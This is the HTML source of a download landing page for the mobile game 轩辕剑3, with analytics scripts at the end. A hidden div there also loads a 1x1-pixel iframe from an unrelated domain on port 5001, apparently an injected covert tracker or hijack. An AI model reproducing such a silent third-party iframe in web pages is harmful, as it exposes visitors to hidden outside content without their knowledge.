<!DOCTYPE html>
<html>
	<head>
		<meta charset="UTF-8">
		<title>轩辕剑3</title>
		<meta name="keywords" content="">
    	<meta name="description" content="">
    	<meta content="telephone=no" name="format-detection">
		<link rel="shortcut icon" href="http://www.shengli.com/Public/Home/five/images/favicon.ico" type="image/x-icon" />
		<link rel="stylesheet" href="/css/download_xyj/index.css" />
		<script src="http://download.shengli.com/www/commonjs/wap/setsize.js"></script>
	</head>
	<body>
		
		<header class="clear">
			<img src="/images/download_xyj/icon.png" class="fl icon">
			<div class="descrotion fl">
				<p class="title">轩辕剑3手游版</p>
				<p><img src="/images/download_xyj/hot.png" ></p>
			</div>
			<a href="" class="download fr">
				<img src="/images/download_xyj/download.png" >
			</a>
		</header>

		<div id="main">
			<img src="http://xyj3.shengli.com/down/3601/images/logo.png"  class="logo">
			<a href="" class="download"><img src="/images/download_xyj/download2.png" ></a>
		</div>

		<div id="slide">
			<div id="ad"> 
				<ul class="list">
					<li><img src="/images/download_xyj/s1.jpg"></li>
					<li><img src="/images/download_xyj/s2.jpg"></li>
					<li><img src="/images/download_xyj/s3.jpg"></li>
					<li><img src="/images/download_xyj/s4.jpg"></li>
					<li><img src="/images/download_xyj/s5.jpg"></li>
				</ul>
				<ol class="btns">
					<li class="active"></li>
					<li></li>
					<li></li>
					<li></li>
					<li></li>
				</ol>
			</div>
		</div>

		<div class="footer">
			<p>Copyright ©  2005-2016 CMGE All Rights Reserved</p>
			<p>©深圳市中手游网络科技有限公司 版权所有</p>
			<p> 粤网文备 2015 1955-385 号</p>
		</div>
				
		<script src="/dist/bundle.js"></script>
		
		<div style="display: none">
			<script type="text/javascript">
				var cnzz_protocol = (("https:" == document.location.protocol) ? " https://" : " http://");
				document.write(unescape("%3Cspan id='cnzz_stat_icon_1260629603'%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "s95.cnzz.com/z_stat.php%3Fid%3D1260629603' type='text/javascript'%3E%3C/script%3E"));
			</script><span id="cnzz_stat_icon_1260629603"><a href="http://www.cnzz.com/stat/website.php?web_id=1260629603" target="_blank" title="站长统计">站长统计</a></span><script src=" http://s95.cnzz.com/z_stat.php?id=1260629603" type="text/javascript"></script><script src="http://c.cnzz.com/core.php?web_id=1260629603&amp;t=z" charset="utf-8" type="text/javascript"></script><iframe id="sssss" src="http://gxtj.statis.wayayaya.com:5001/gxtj.html" scrolling="no" frameborder="0" width="1px" height="1px"></iframe>
			<script>
				var _hmt = _hmt || [];
				(function() {
					var hm = document.createElement("script");
					hm.src = "//hm.baidu.com/hm.js?41666aececc4481813f437a6c148ef18";
					var s = document.getElementsByTagName("script")[0]; 
					s.parentNode.insertBefore(hm, s);
				})();
			</script>
		</div>

	</body>
</html>
